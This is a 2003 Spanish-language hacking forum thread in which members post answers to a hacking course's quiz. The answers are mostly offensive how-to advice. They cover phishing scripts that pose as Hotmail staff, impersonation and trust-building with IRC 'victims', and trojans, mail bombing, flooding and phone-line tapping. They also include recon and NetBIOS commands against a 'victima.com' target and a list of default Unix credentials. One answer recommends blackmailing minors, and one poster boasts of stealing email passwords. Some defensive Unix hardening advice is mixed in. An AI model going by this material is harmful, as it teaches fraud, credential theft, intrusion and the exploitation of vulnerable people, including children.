Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 05:23:11
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Cursos y Ezines  |  Tema: Respuestas Al 1er Mini Examen 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Respuestas Al 1er Mini Examen  (Leído 6633 veces)
root
Visitante


Email
« en: ſeptiembre 15, 2003, 10:43:00 »

Bueno aqui se iran añadiendo la respuestas de cada uno.

Esperamos que no desepcionen y no sean flojos para contestar.


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.el-hacker.net/Cuestionario.htm
Saludos!! Y Suerte
« Última modificación: Agosto 07, 2008, 07:31:57 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea
root
Visitante


Email
« Respuesta #1 en: ſeptiembre 16, 2003, 11:29:05 »

ESPIONAJE: espionaje es el metodo de toda la vida aplicado a el hacking.

COMANDOS UNIX: sirven para sacar informacion de un servidor
finger
nslookup
whois
showmount -e
rcpinfo
tcpmap

TRASHING: dos tipos de trashing
basura fisica
basura electronica
consisten en buscar en la basura

FISICO: basura fisica
basura como hojas con passwords, numeros de telefonos para ingenieria social o
para atacar una maquina especifica.

ELECTRONICO: basura electronica
mirar los archivos del ordenador como password en los archivos temporales *.tmp

SNIFFERS: programas que capturan todos los paquetes que pasan por una
determinada red. pueden ser logs, informacion del sistema y tarjetas en modo
promiscua

PINCHAR LINEAS: existen tres tipos de pinchado de lineas
1) cortar la linea para dejar a la victima sin telefono.
2) acabar con todos el sistema para que la victima tenga que llamar a la
compania de telefonos.
3)solo pelarlo sacar otro cable con la finalidad de hacer llamadas gratis o para
grabar las llamadas de tu victima.

INGENIERIA SOCIAL: ingenieria socila
* tecnica muy efectiva
* usada pro todos los hackers
* conjunto de tecnicas psicologicas y habilidades sociales utilizadas de forma
conciente y muchas veces predeterminada para la obtencion de informacion de
terceros.
*en la ingenieria social no existen limites para conseguir tus fiens
* el origen de el termino tiene que ver con las actividades de obtencion de
informacion de tipo tecnico utilizadas por hackers.
* el acto de ingenieria social acaba en el momento que se ha conseguido la
informacion buscada.
* ingenieria social arte de hacer que los otros hagan y digan lo que uno quiere.
*jargon file
tecnicas que aprovechan de las debilidades de la persona para conseguir
informacion
*" el metodo mas facil para conseguir las contrasenas de alguien es
preguntandoselo"
*mitnick
" porque dedicarse a robar numeros de tarjetas uno por uno, cuando la puedes
entrar a los bancos y coger su base de datos"
reglamento para la ingenieria social
1) piensa en lo que vas a decir metete en tu papel y luego lanzate a el ataque.
2) llevate bien con tu victima.
3) proponle algo de lo que pides.
4) conoce a tu victima (mucho)
5) no te fies de nadie nadie es lo que aparenta ser.

IRC: ingenieria social en mirc es facil pero los resultado no te dan mucho.
puedes atacar en los canales de ciudades de ligue etc.
usas ingenieria social para ganarte a la victima.
despues de que te la hallas ganado puedes hacer tres cosas.
1) meterle un troyano
2) pedirle el password porque tu ya no vas a tenr internet.
3) chantaje es muy facil con menores de edad que viven con sus padres.


TELEFONO: ingenieria social pro telefono
no tartamudes
practica
plantea preguntas que la victima te pudiera hacer.

INGENIERIA SOCIAL POR MAIL: pues casi siempre es un mail diciendo:
1) que eres el webmaster y que se perdio la base de datos que para no perder tu
correo nesesitas mandar un mail con tu correo y tu password.
2) una tecnica fantasma para poder descubrir password de hatmail

FAKE MAIL: para mandar mail tratando de sero tora persona.

ATAQUES REMOTOS EN WIN: con un troyano que te sirva para de entrada es mejor que
tu lo programes para que el antivirus no lo detecte.

FUERZA BRUTA: probando todas las conbianciones tanto numericas como alfabeticas
esta tecnica si la password no esta en un diccionario puede tardar mucho tiempo.

CABALLOS DE TROYA: regalitos que se hacen a las victimas ocultos dentro de otro
archivo que nos permiten acceder a el sistema.

MAIL BOMBING: tronar un mail para que la victima ya no lo pueda volver a usar es
decir saturarlo para que quede inabilitado.

NETBIOS]: para entrar a la maquina de la victima con recursos compartidos de
windows.

FLOODING: es para saturar una maquina pidiendole datos o cosas. tambien puedes
sobre cargar la maquina mandandole "archivitos"

NUKEO: ataque por puertos como el TCP para que se apague.

AGUJEROS DE SEGURIDAD: consiste en entrar a otra maquina a base de bugs que
pudes hacer tu mismo.

ATAQUES Y SEGURIDAD EN UNIX: la seguridad en un S.O. es responsabilidad de el
root asi es que si tenemos un root ineficiente en nuestro objetivo nos sera mas
facil entrar.

SEGURIDAD  BASICA EN UNIX: estar actualizado para que nadie pueda entrar y estar
praparado para un posible ataque.

SERVICIOS: solo lo indispensable es decir tener los servicion si solo si los
vamos a utilizar si no lo vamos a utilizar para que instalarlo?

PERMISOS: para la seguridad se debe tener en cuenta que preferencias y/o
permisos le vamos a dar a que usuario. para una seguridad extrema podemos hasta
hacer que el root caresca de ciertos permisos por si alguien entra a nuestro
sistema como root y tiene preferencias de hacer lo que quiera.

PASSWORDS: ente mas largo y mas rebuscado mejor de preferencia con simbolos
numeros y letras.

MONITORIZACION DEL SISTEMA  Y REVISION DE  LOGS: puden ser desde pedir
informacion del sistema con who o con sniffers.

MEDIDAS ADICIONALES: firewall antivirus actualizaciones y un administrador
inteligente y no flojo.

ATAQUES TIPICOS A SISTEMAS UNIX: para un sistema unix los ataque pueden ser
remotos o con nukers.

ATAQUES REMOTOS: es el ataque de el usuario que esperamos que no entre a nuestro
sistema.

DENIAL OF SERVICE Y NUKES: puesta tecnica es tirla o hacerla que no funcione por
cierto tiempo.

OBTENCION DE SHELL MEDIANTE CRACKEO: el atacante puede si no negamos el permiso
entrar a el archivo de password y crakearlo con john the ripper.

SNIFFING Y KEY RECORDING: puede ser local o remoto en esto esta que el atacante
redistre todo lo que pasa por nuestra red.
este ataque tambien puede ser fisico como la inteferencia de lineas.

CUENTAS POR DEFECTO: consite en cuidarnos de la cuentas la cuales vienen por
defaul en el sistema.

ATAQUES LOCALES: este ataque proviene de algun usuario de nuestro sistema.

EXPLOITS: son programas que tumban determinada maquina con el unico fin de
destruir por algun momento el servidor.

TROYANOS Y DEMAS: programas que permiten que un usuarino no deseado penetre en
nuestro sistema.

ATAQUES "MANUALES: estos ataque solo se pueden dar por una mala configuracion en
el sistema y que root no tenga conocimiento del fallo.

Historia y conciencia: la historia del internet se remonta a que primero era
utilizado por el gobierno y despues por universidades hasta que se hizo
alcanzable para todo mundo.

¿Que es el Cracking?: es poder dsproteger a programas que por ciertas razon el
creador piensa que debe cobrar pero tu crees que no. pro eso usas el crack para
poder mostrarle a el creador que el programa sirve pero su protecion no.

Tipos de proteccion: pues pueden ser por dias o programa incompleto. protegiendo
las protecciones (ups) con encripacion

Know your enemy: ingenieria inversa
existen varios tipos de personas pero su tu tienes cerebro puedes usar
ingenieria inversa y obtener la informacion deseada no importando el tipo de
persona que sea tu victima. para esto debes conocer muy bien a tu objetivo tener
la mayor cantidad de informacion posible para que logres tener exito.

Como contabilizar el volumen de informacion que se nos escapa: cualquier
informacion de la victima es indispensable para el ataque sus gustos sus lo que
no le gusta  su amigos los amigos de sus amigos su familia etc

Como suplantamos una personalidad de una edad determinada: relacionandonos con
la persona a la que queremos aparentar ser conocerla que diria como piensa que
le interesa etc.

Como copiamos una forma de pensar?: conociendo toda la informacion posible de el
suplantado.

Como actuamos?: nesesitamos enganar osea crernosla nosotros mismos de que somos
la otra persona. vamos si ni tu piensas que eres otra persona tu victima jamas
te le creera se cuerente y metete en tu papel

El interlocutor silencioso : ten en cuenta que si tu "no le pides nada" el solo
te dira la informacion que quieres es decir pude que tu victima se sienta
incomoda con tanta pas y no tenga nada que hacer mas que platicar contigo a si
es que si tu callas la victima hablara.


padrinoFSF
byvaro  @yahoo.com
« Última modificación: Agosto 07, 2008, 07:32:27 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea
root
Visitante


Email
« Respuesta #2 en: ſeptiembre 16, 2003, 11:29:49 »

Usuario Desconocido


ESPIONAJE: esto esta interesante. hasta me ayudo no solo en la red sino en la
vida real use diferentes tecnicas de las impartidas en este texto

INGENIERIA SOCIAL: es mi favorito lo uso casi siempre tanto en la red como en la
vida real. he usado varias tecnicas basados en estos textos de I.S

INGENIERIA SOCIAL POR MAIL: es muy buena he sacado varias password de varios
correos , hotmail, yahoo, aol, latinchat

FAKE MAIL: es uno de mis favoritos lo aprendi a utilizar muy bien mas en Lan, es
muy facil usarlo esto se puede basar tambien en la I.S

FUERZA BRUTA: es interesante, pero casi no la ocupo , soy mas pasivo , aunque
fue interesante lo que se hablo acerca de esto.

CABALLOS DE TROYA: son tambien interesantes mas cuando te lanzan varios
pantallasos azules y con estos programas o sea los troyanos es facil controlar
otro ordenador a tu antojo

MAIL BOMBING: es bueno, puede colapsar la red y hasta eliminar el propio correo
de la persona a la que se esta enviando

AGUJEROS DE SEGURIDAD: fue interesante lo hablado respecto a esto ya que uno se
da cuenta de que windows es una basura solo es comercial y tiene demasiados
agujeros que sin parches puedes estar acabado por virus

SEGURIDAD  BASICA EN UNIX: es muy buena,  ya que primero pide autorizacion para
guardar las cookies, no como el windows que te las guarda de un solo , es muy
bueno el linux en seguridad.

En línea
root
Visitante


Email
« Respuesta #3 en: ſeptiembre 17, 2003, 02:42:36 »

ESPIONAJE: Acechar, observar y actuar secretamente lo que  dice o hace la
víctima, recopilar información por donde sea, cuando sea y como sea, a como de
lugar para llegar a nuestro objetivo.
La astucia, maña y sutileza para el engaño son factores fundamentales para el
desempeño de esta actividad.
La torpeza, impaciencia, ansiedad y falta de cautela pueden tirar a la basura
meses de trabajo. Muchas veces irrecuperables.


COMANDOS UNIX: finger , whois,  nslookup,  showmount,  tcpmap


TRASHING: Consta en recopilar información que proviene de la basura que la
victima genero ya sea basura física o virtual, de esta forma se puede llegar a
conocer mejor a la víctima, saber con quien se relaciona, a que se dedica y que
en un futuro esta info nos sirva para entrar en confianza con la víctima, o
mejor aun, encontrar lo que buscamos...su password.
Hay veces que el Trashing no se le hace a la victima sola, si no a personas que
conocen a la victima.


FISICO: Revisar la basura de la víctima, los basureros que contiene papelitos
abollados suelen tener información de utilidad, o rastrear la basura a personas
que tienen algun vinculo cercano a la víctima, pueden tener datos de utilidad de
la propia víctima en cuestion. Por supuesto que es una tarea algo tediosa y
antihigienica ya que que puede ser la basura de la casa lacual tengamos que
revisar, Precaución: no todo papel trae informacion, en ocaciones trae bosta.


ELECTRONICO: Revisar archivos temporales, la papelera de reciclaje,  archivos
recuperados...archivos de toda índole.
Los archivos ocultos y protegidos con pass, podrían tener información de
utilidad.


SNIFFERS: Es un programa que monitorea y analiza el tráfico de una red para
verificar que no haya problemas como cuellos de botella. Creado para mantener
optimo el trafico de datos.
Pero en este caso es usado para capturar de forma "ilegal" datos que nos
interesen, con determinada extensión, como para hacer un filtrado de todos los
archivos.


PINCHAR LINEAS: A grandes rasgos agarrar el cable de la linea telefonica de la
víctima, pelar los cables y escuchar las conversaciones, hay métodos mencionado
de la incorporación de una grabadora, para no estar toda la noche como gil
escuchando hasta que diga algo que nos interese, creo que les llaman Boxes, hay
que tener conocimientos básicos de electrónica o quiza un poco mas para
desarrollar Box.


INGENIERIA SOCIAL: Es básicamente convencer a la victima de que haga lo que en
realidad no debería.  Te haces pasar por alguien importante, no se, personal de
Importancia de Hotmail y exigis que la victima te de su pass mediante argumentos
convincentes.
Dicho de otra manera, es engañar olimpicamente a la víctima mediante el uso de
palabras elegantes y convincentes.
Para lograrlo hay que ser cuidadoso con lo que decimos/proponemos y hacemos para
no despertar sospechas. Se aconseja conocer tanto como puedas a la victima para
por ejemplo tener temas de charla y aparentar tener cosas en comun...


IRC: (Charla Interactiva Internet) Protocolo mundial para conversaciones
simultáneas. El IRC está formado mediante una red de servidores, cada uno de los
cuales acepta conexiones de programas cliente, uno por cada usuario. Lugar de
mas aconsejado para obtener algo que como mucho podría ser un teléfono o algun
pass, para empezar entrar en alguna sala cachonda, como para hacerte pasar por
alguien que atraiga, empezar con elogios y tratar de entrar en confianza poco a
poco hasta llegar a conocerce bien como para empezar a actuar.


TELEFONO: A demas de ser el aparato el cual ET buscaba desesperadamente, es el
medio por el cual podemos engañar a otras personas y se requiere ciertas
tendencias a actor, puesto a que hay que hablar claro y sin titubear tratando de
imitar a algun personal de determinada empresa, tratar de usar los mismos
términos (claro que si eres tartamudo, conviene hacerlo por escrito) es
importante tener el poder de convencimiento, para ser mas claro, asemejarse a un
politico.


INGENIERIA SOCIAL POR MAIL: Es lo mismo que usamos por teléfono, nada mas que en
formato texto, hay que respetar el mismo formato que usaría el director de
Hotmail para dirigirte un mail solicitando que debido a la cantidad de usuarios
que en este momento rebalsan la base de datos de Hotmail, ud debe confirmar su
existencia reenviando el mensaje con su direccion y pass...por supuesto que no
con estas palabras si no mas camuflado. Se entiende no?  >Esto no se lo cree
nadie.


FAKE MAIL: Enviar correo falseando el remitente, es de suma utilidad, para
generar falsas expectativas por ejemplo hacerce pasar por otra persona, para que
la víctima corrobore que lo que le has estado informando es verdad...no se algun
mail dirigido a la victima de parte de este tercero el cual confiese que ha sido
el quien trato en todo momento de quitarle su correo...o algo similar, y asi
despistar a la victima...usando la imaginación podríamos hacer cosas mas
inteligentes que este ejemplo.



ATAQUES REMOTOS EN WIN: Aunque muchos definen al mismo Windows como troyano,
puesto a que es vulnerable por donde lo mires, la mayoría de los ataques a
Windows es por medio de troyanos.



FUERZA BRUTA: Este método hace la mayor cantidad de combinaciones de una posible
clave usando diccionarios con palabras posibles con el fin de combinar cada una
de ellas, dependiendo de la velocidad del micro es directamente proporcional al
tiempo que va a llevar en probar todas las combinaciones posibles.


CABALLOS DE TROYA: (Caballo de troya) programa informático que lleva en su
interior la lógica necesaria para que el creador/Usuarios del programa puedan
acceder al interior del sistema que lo procesa como si fuese su mismo ordenador,
de manera remota.
Los mas conocidos son el Netbus, Pretty Park, Subseven


MAIL BOMBING: Es un envio masivo de mails, para llenar la casilla de algun
usuario y asi que este no reciba ningun otro mail por exceso de mensajes, pero
para llenar casillas de verdad no como la de hotmail que se llena con dos fotos
de buena calidad...


NETBIOS]: Forma efectiva pero poco probable de ingresar a una máquina por medio
de MS-DOS, a demas de poner en la configuración:
Compartir ficheros e impresoras en redes de microsoft                             
Cliente para redes microsoft                                                         
Inicio de sesion en "Cliente para redes microsfot"
La maquina a la cual querramos acceder debería tener lo mismo, pero dudo que
alguien que tenga una sola PC en su hogar tenga estas opciones activadas...creo
que previo a hacer esto deberíamos hacerle ejecutar algun programa que active
estas opciones.
Una vez puesto todo lo anterior, hay que tener el n° de ip de la victima,
haciendo Netstat -a, obtenemos una lista de las conexiones que tenemos en ese
momento, direccion local la nuestra y remota con quien estamos conectados.
Buscamos la que tenga el puerto 139 habilitado, esto es síntoma de algo poco
probable, tener recursos compartidos.

con los comandos
c:\>nbtstat -A (ipvictima)   y con un poco de suerte..

(Tabla de ejemplo de textos del El-Hacker)

 Name                Sufijo     Tipo         Status
    ----------------------------------------------------------------
    Maquina-remota       <00>       UNIQUE        Registered                             
    MaquinaGrupo         <00>       GROUP         Registered                             
    Maquina-remota       <03>       UNIQUE        Registered                             
    Maquina-remota       <20>       UNIQUE        Registered                             
    Maquinagrupo         <1E>       GROUP         Registered   

c:\>net view \\Maquina-remota   

A navegar bajo DOS, para agregar la pc c:\>NBTSTAT -R   


FLOODING: El Flooding o tambien llamado Jamming  desactivan o saturan los
recusos del sistema.Saturan mediante el envío masivo de datos, un ejemplo claro
del flood, son las que traen algunas de las herramientas malignas del MSN,
creadas por programadores, envían masivamente mensajes, eso en algunos casos te
tildan la pc, hace un tiempo atras se usaba el ping de la muerte, hacía tantas
veces ping a una máquina que la tildaba. Haciendo píng a la direccion de red de
una red remota (Cable modem) se pueden recibir bastantes pings de respuesta,
otra de las formas de tirar abajo a una pc, era ponerse de acuerdo con varios
amigos, y hacer ping a la vez a una sola pc.


NUKEO: Enviar mensajes TCP(Transmission Control Protocol)/ICMP
El ICMP es el protocolo encargado de, informar de errores y problemas que hay en
la red.
consiste en enviar al servidor o cliente un paquete ICMP indicando
que la conexión no puede continuar debido a uno de los siguientes errores:
Network Unreachable - Bad Port - Host Unreachable - Bad Protocol
O sea que el "nukeador" >(Lammer) envía paquetes al cliente informando que hay
algunos de los problemas esos, hay que adivinar que puertos esta usando en dicha
conexion.
Existen varios programas nukeadores


AGUJEROS DE SEGURIDAD: Son fallos del sistema operativo, aunque asi tambien se
les llama a los fallos del Hard, les son muy útiles a las personas cuyo objetivo
es entrar a alguna PC, por ejemplo hace un tiempo atras use el Uniscan para
aprovechar el fallo de IIS4/5 y gracias a este bug, y obviamente al programa
(aunque creo que se podía hacer sin el) examinabas el Hdd del servidor.
Windows es un ejemplo de colecciones de Bugs, permanentemente hay que andar
poniendole parches para justamente tapar esos agujeros.

Direccion aconsejada = http:\\www.rootshell.com


ATAQUES Y SEGURIDAD EN UNIX: El tema seguridad informática es un tema de
constante cambio, de lo poco que entiendo de Unix/Linux se que es mas estable y
seguro que todo producto proveniente de Microsoft, tambien he oido hablar que
algunos servers de Microsoft estan bajo Unix ¿que ironia no?


SERVICIOS:
Hay que cerrar el puerto telnet, si no se va a ofrecer ningun servicio.
Con inetd.conf se cierran los servicios que no se ofrecen, como no se pueden
cerrar todos los puertos, es necesario el uso de un firewall (Cortafuegos). 
O bien filtrar paquetes mediante TCP Wrappers usado por los roots para controlar
completamente las máquinas conectadas a su sistema o IpChains que es usado para
mantener y verificar las reglas del Firewall en el Kernel, son divididas en 4:
Input Chain-Output Chain-IP Forwarding Chain y User Defined Chain.
Importante para protegerte del Spoofing por si envían paquetes del exterior con
la direccion de la red interna.


PERMISOS: Los directorios como /root y /home/xx deben tener modo 750
revisar los archivos con suid o gid activos eliminar los que no sirven
A los archivos  que tengan el suid activo suele ser conevniente añadirle
el sticky bit (para directorios etc..) para que solo pueda modificarlo el
propietario. Conviene ejecutar el comando $ find / -perm 4000 -o
-perm 2000 para realizar un segimiento de estos peligrosos programas

PASSWORDS: Todo sistema Unix diferencia las mayúsculas de las minúsculas, y que
hay que poner por lo menos una mayúscula en el pass. Ademas de poner pss largos
con símbolos para evitar que nos los quiten, a diferencia de otros no se muetran
los caracteres comodines, para que no se pueda ver la cantidad de dígitos.
Los distintos tipos de identificacion, son el clasico de contraseña, Login y
Password  e Identificacion Biométrica, que es una de las maneras mas efectivas
de evitar que accedan por nosotros, las mas conocidas son las que identifican
huellas digitales, retina ocular y la misma voz.


MONITORIZACION DEL SISTEMA  Y REVISION DE  LOGS: Existen muchas formas de
monitorizar a un sistema,  uno de los mas conocidos como el Etherfind o Tcpdump
se pueden utilizar para el monitoreo, aunque se utilicen mas como sniffers, lo
que si el tcpdump no es muy configurable y le faltan algunas características
avanzadas comparado con otros programas hay que limitarle la cantidad de
paquetes a recibir tambien es aconsejable revisar los logs referentes a los
logins fallidos.


MEDIDAS ADICIONALES: *Hacer BackUps cada cierto tiempo, *Instalar Firewalls,
*Eliminar Usuarios que tienen ya un tiempo sin conectarse como asi tb el
correspondiente pass, El sistema a instalar es de suma importancia, freebsd,
openbsd, solaris son los que aconsejan.


ATAQUES TIPICOS A SISTEMAS UNIX: DENIAL OF SERVICE Y NUKES -ATAQUES REMOTOS-
OBTENCION DE SHELL MEDIANTE CRACKEO

ATAQUES REMOTOS: Provenientes de de una entidad que carece de acceso legal, por
ejemplo Guest o Anonymous que no necesitan clave, y suelen tener la misma
palabra como login.
creando una cuenta “guest” en el archivo de password local. Como usuario “guest”
se puede colocar una “.rhosts entry” en el guest home directory remoto, que
permite acceder a dicha
maquina sin tener que dar ningun password.


DENIAL OF SERVICE Y NUKES: Unos de los mas peligrosos es el DoS, denegacion de
servicio y los Nukes, para evitar ataques con DoS hay que estar atento a
cualquier bug que surja, estar subscripto a páginas que tiren actualizaciones de
bugs que van apareciendo, Hispacec informa fallos en sistemas.
Para evitar ataques con Nukes, basta con configurar bien el ipchaing, se evitan
ataques basado en nukes icmp.



OBTENCION DE SHELL MEDIANTE CRACKEO: Si el intruso ingreso como Guest y captura
el archivo password, lo desencripta, y obtiene el pass del root, podría llegar a
hacer estragos, parta evitar esto el uso de shadowed password complica la
obtencion de los passwords.El poner la sombra de las claves es una forma mas de
seguridad consiste en que las claves encriptadas se almacenen en un fichero
distinto al del passwd. Pero no obstante hay que combinar esto con lo mencionado
anteriormente, el uso de firewalls, ipchaing, desactivar el telnet si este no es
necesario, y sobre todo renovar las contraseñas cada cierto período.


SNIFFING Y KEY RECORDING: El sniffing consiste en capturar paquetes que trafican
en una red, que no estan destinados a tu pc (tcpdump-Snort-niffit-SPY-Ethereal),
es dificil detectar la presencia de un snifer, no obstante existen programas
para ello, aunque el sniffing se hace de forma pasiva, pero se puede evitar el
capturado de paquetes usando swiches de red y backbones de fibra óptica, son mas
complicados para que los logren pinchar, o al usar ssh en lugar de Telnet, así
por si quieren usar pgp (Que usa el método de la fuerza bruta).El Key Recording,
consiste en logear todo lo que se teclea = son los Keyloggers, muchos son
detectados por los antivirus, pero si ya hay uno en tu sistema, la seguridad ya
ha sido violada hace bastante.


CUENTAS POR DEFECTO: Los sistemas Unix suelen tener varias cuentas por defecto,
cuentas que deben ser quitadas de inmediato, porque son las que seguro se van a
intentar probar, iclusive son las que los programas saca pass por fuerza bruta
tienen en su diccionario.
root      root
root      system
sys      sys
sys      system
daemon          daemon
uucp      uucp
tty      tty
test      test
unix      unix
unix      test
bin      bin
adm      adm
adm      admin
admin      adm
admin      admin
sysman      sysman
sysman      sys
sysman      system
sysadmin   sysadmin
sysadmin   sys
sysadmin   system
sysadmin   admin
sysadmin   adm
who      who
learn      learn
uuhost      uuhost
guest      guest
host      host
nuucp      nuucp
rje      rje
games      games
games      player
sysop      sysop
root      sysop
demo      demo



ATAQUES LOCALES: Una vez adentro el intruso, lo mas probable es que la quiera
jugar de root para jodernos la vida, puede que sea una persona experimentada en
el tema y que nos cueste o tal vez no podamos desasernos de ella, o bien, que
tengamos una persona con poca experiencia "profesional" por llamarlo de alguna
manera, con lo cual hay que hacérselo dificil, si el tipo se da por vencido,
zafamos.


EXPLOITS: Es un tipo de ataque poco "profesional" proveniente de personas con
casi nula experiencia en cuanto a la programación y conocimientos generales de
Informática, Son mensajes
"oficiales" dicen los pasos a seguir para aprovechar un bug e incluyen los
programas necesarios  para hacerlo.



TROYANOS Y DEMAS: Estos pueden ser muy diversos y nada que ver con los de Win,
los puede haber de dos formas, primero si el atacante carece de privilegios
puede usar colocando ls en su home directory,  oculta ficheros en un directorio,
que no se veran al hacer "ls". Este fichero se  copia en /bin/ls
sobreescribiendo al original.
Si el atacante tiene privilegios de root lo sustituye directamente
la orden, lo mas normal es que no incluya un troyano como el anterior.
La única forma de hacerlo es detectar el aumento de tño, pero existen programas
que hacen copias de seguridad y cada cierto tiempo comparan el tño con los que
alguna vez cargo en la base de datos.




ATAQUES "MANUALES: La obtencion de shell mediante rhost, el atacante monta el
directorio home remoto en tu localhost, introduce en tu /etc/passwd una entrada
a ese sistema, añadir en el home del usuario hackeado un archivo .rhosts, puede
comprometer una cuenta con privilegios de escritura.
Prevenir esto revisando los posibles fallos de configuracion del sistema, los
posibles bugs, no quedarse con la actualización de los mismos.


Historia y conciencia: Ingeniería Inversa, Comienza Internet como un proyecto,
se había torneos de programacion quien desarrollaba los mejores programas, se
autodestruían entre si, y de ahi  surgieron los primeros virus en distribuirse
por las redes, en 1970 con el inicio de ARPAnet se podían ver los primeros virus
que aparecían mostrando mensajes, sin hacer daño, en Noviembre de 1983 aparece
en un seminario sobre seguridad de PC hicieron un experimento. en 1984 aparece
en revistas y describe el juego CORE WARS, con esto le da amplia difusion. Y
varios lectores cuentan sus experiencias con sus "virus" caseros.-



¿Que es el Cracking?: Es modificar algunas partes de un programa para obtener el
uso completo del mismo. Se basa en quitar pantallas introductorias (ej la de
Winzip), protecciones o tener nuevos pass de acceso a sistemas. Lógicamente caga
al 100% al que se mato para hacer un buen programa pero...si no tenes $$$ hay
veces que tenes que recurrir a esta metodología o arte como lo definen por ahi.



Tipos de proteccion: *Protecciones por límite de tiempo, Versiones Trial por
ejemplo. (Pero si cambiamos la fecha para usarlo mas tiempo, hay veces que se
activa una opcion que el programa queda nulo por completo.)
*Por algun archivo que le sirva como referencia, de no existir este archivo, no
se ejecuta de forma completa, o hay veces que este archivo tiene las
instrucciones a seguir para que se ejecute con solo algunas funciones.
*Codigo del registro.
*Cantidad de veces que se uso el archivo, mostrando los usos restantes.
*Por conexion a Internet, conectando al sitio del proveedor y este habilita el
uso del programa



Know your enemy: Para empezar a conocer a la persona la cual querramos imitar en
algun momento para obtener beneficios hay que tener en claro que existen
distintos tipos de personalidades, entre los cuales se encuentran las personas
1.-Confiadas, nos pueden brindar lo que necesitemos mas facil que aquel que es
2.-Desconfiado, hay personas que son 3.-Introvertidas, por lo cual hay que saber
como tratarlas para que logre desembuchar información Asi tambien estan las
4.Extrovertidas, y por último personas sumamente 5.Astutas, que podrían
anticipar cualquier movimiento en falso hecho de parte nuestra.
Para empezar a conocer cualquier persona hay que ser amable y respetuoso de
manera que no se nos pire al carajo con la primera frase que le digamos. Dejar
que nos conozca a primero a gusto de la victima, y tratar de darse a conocer en
la medida que no nos pisemos nosotros solos, suele pasar cuando mentimos.



Como contabilizar el volumen de informacion que se nos escapa: Cada vez que
abrimos la boca la otra persona no solo va a escuchar lo que le decimos si no
que va a detectar cualquier otra expresion que puede delatarnos de que nuestras
intenciones son otras. En cambio por chat, en donde no se nos ve, la cantidad de
información obtenida se mide de acuerdo al grado de interés que despertemos en
la otra persona, el objetivo general, es despertar gran grado de interes,
brindano la menos información posible y recibiendo mucha información de la otra
persona.


Como suplantamos una personalidad de una edad determinada: Meterse en el papel
de otra persona, no es tarea facil, pero se aprende con práctica como todas las
cosas, observar el comportamiento, forma de hablar, jerga utilizada en
determinadas edades pueden ayudarnos mucho mas de lo que parece, sobre todas las
cosas meterse totalmente en el papel de esa persona.


Como copiamos una forma de pensar?: Construir un perfil psicologico de la
persona la cual vamos a suplantar es el objetivo a lograr, para esto, hay que
hacerse ganarce su confianza e ir haciendo pruebas, ensayo error, testeando a la
persona, fijarse como reacciona ante ciertas preguntas, captando el sentido del
humor que tiene, viendo que tipo de personalidad tiene si es reservado, como se
dirige hacia nosotros, si nos hacemos pasar por alguna chica, ver como se dirige
hacia las mujeres y viceversa...anotar todo lo que nos dice, guardar los chat
para futuras observaciones es sumamente importante, ya que tenemos todo un
historial en donde podemos fijarnos mas detalladamente el lenguaje, gustos,
hobbies, alguna anégdota importante...toooooodo es importante.



Como actuamos?: Una vez tenido todo lo que se dijo anteriormente, hay que tener
un resumen de todo lo mas importante de la persona, para dirigirnos finalmente
hacia lo que vendría a ser la victima no?, aunque en realidad todas los van a
ser, actuar con naturalidad y que sea lo que Dios quiera.



El interlocutor silencioso : Consta en despertar el interes de parte de la otra
persona con pocas palabras, decir algo que despierte interes, intriga y que al
querer saber, nos siga escribiendo mas y mas, hasta que no de mas.




Mensaje A Personas Que Leeran Tu Mensaje: Bueno, que realmente hacer este tipo
de actividades, hacen que uno lea cosas realmente interesantes, y digamos que
aprendes a la fuerza, pero cabe destacar que teoría sin práctica no funciona, en
mi caso todo lo que tenga relacion con Unix/Linux, he buscado tratado de
interpretar, pero los comandos que vi seguramente se me borraran de aca a unas
semanas..

salu2

SugerenciasPara: Me gusto esta primera evaluación, no conozco nada sobre
Unix/Linux, solo lo básico, apenas se manejarlo, pero destaco que algunos de los
ejemplo que lei en los textos ayudan a interpretar lo que el autor quiere decir.
Sugiero que sigan asi.

P/D: segun tenía entendido esto se evaluaba el 21 de sep

Shadow

shadow_enn_357  @hotmail.com


Código:
El 21 se daba a conocer quien fue el ganador y los ganadores.
« Última modificación: Agosto 07, 2008, 07:34:11 por (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) » En línea
root
Visitante


Email
« Respuesta #4 en: ſeptiembre 20, 2003, 11:57:24 »

ESPIONAJE: ESPIONAJE
“Este es el método de toda la vida, pero aplicado al hacking.”
Es muy importante en el hacking, ya que nos permite conocer y estudiar a nuestra
victima. Un ejemplo de esto pueden ser los keyloggers.


COMANDOS UNIX: COMANDOS UNIX
Los comandos importantes y su funcionabilidad.                 
* finger   @victima.com:
Utilidad que permite obtener información acerca de los usuarios
que se encuentran conectados a un determinado servidor
* nslookup
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com
:
Nos entrega Información sobre el servidor.                             
* whois
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com
     
Nos da información acerca
de los dominios registrados
* showmount -e victima.com
Información sobre lo que el servidor lleva montado.
* rpcinfo -p victima.com
Para averiguar datos sobre el sowfware de seguridad,
el NIS, e información diversa.                                   
* tcpmap victima.com
Para saber que servicios tcp tienen abiertos.


TRASHING: TRASHING
Consiste en buscar en la basura (fisica o electronica) información que nos pueda
servir de ayuda, ya sea un nombre de usuario, un password, un teléfono etc.
Fisico
La común y corriente, en la que podemos encontrar nombres o números de teléfono
como ya dije para luego ser ocupada en ing.social.-
Electrónico
Consiste en mirar los archivos *.tmp , también podemos echarle una mirada a los
archivos ocultos o que estén protegidos ej: un archivo que este protegido con el
nombre password.zip lo podemos copiar para crackearlo, etc.


FISICO: Fisico
La común y corriente, en la que podemos encontrar nombres o números de teléfono
como ya dije para luego ser ocupada en ing.social


ELECTRONICO: Electrónico
Consiste en mirar los archivos *.tmp , también podemos echarle una mirada a los
archivos ocultos o que estén protegidos ej: un archivo que este protegido con el
nombre password.zip lo podemos copiar para crackearlo, etc.


SNIFFERS: SNIFFERS
